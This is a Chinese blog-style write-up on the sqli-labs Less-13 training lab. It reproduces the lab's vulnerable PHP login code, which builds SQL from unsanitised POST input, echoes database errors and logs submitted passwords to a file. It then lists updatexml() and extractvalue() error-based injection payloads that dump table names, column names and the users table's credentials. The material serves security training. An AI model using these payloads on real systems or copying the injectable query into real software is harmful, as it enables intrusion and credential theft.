本文探讨了一种名为Less-13的SQL注入漏洞,通过字符串操作技巧实现双注入攻击,并展示了利用updatexml()和extractvalue()函数进行布尔盲注的方法。作者详细介绍了几种payload的构造,以及如何通过错误注入获取数据库敏感信息。
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-13- Double Injection- String- with twist</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :
<input type="text" name="uname" value=""/>
</div>
<div> Password :
<input type="text" name="passwd" value=""/>
</div></br>
<div style=" margin-top:9px;margin-left:90px;">
<input type="submit" name="submit" value="Submit" />
</div>
</form>
</div></div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
</font>
</div>
</body>
</html>
这里是会输出数据库报错的。所以是可以进行报错注入。
而且这里一个红色图片和一个蓝色图片,典型的可以进行布尔盲注。
这里使一下报错注入:
updatexml()
uname=1') union select 1,updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=2
uname=1') union select 1,updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)#&passwd=2
uname=1') union select 1,updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31),0x7e),1)#&passwd=2
uname=1') union select 1,updatexml(1,concat(0x7e,substr((select group_concat(id,password,username) from users),1,31),0x7e),1)#&passwd=2extractvalue()
uname=1') union select 1,extractvalue(1,concat(0x7e,database(),0x7e))#&passwd=2
uname=1') union select 1,extractvalue(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e))#&passwd=2
uname=1') union select 1,extractvalue(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,31),0x7e))#&passwd=2
uname=1') union select 1,extractvalue(1,concat(0x7e,substr((select group_concat(id,username,password) from users),32,31),0x7e))#&passwd=2extractvalue查询和updataxml类似,只可以回显32位
扫一扫
244
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
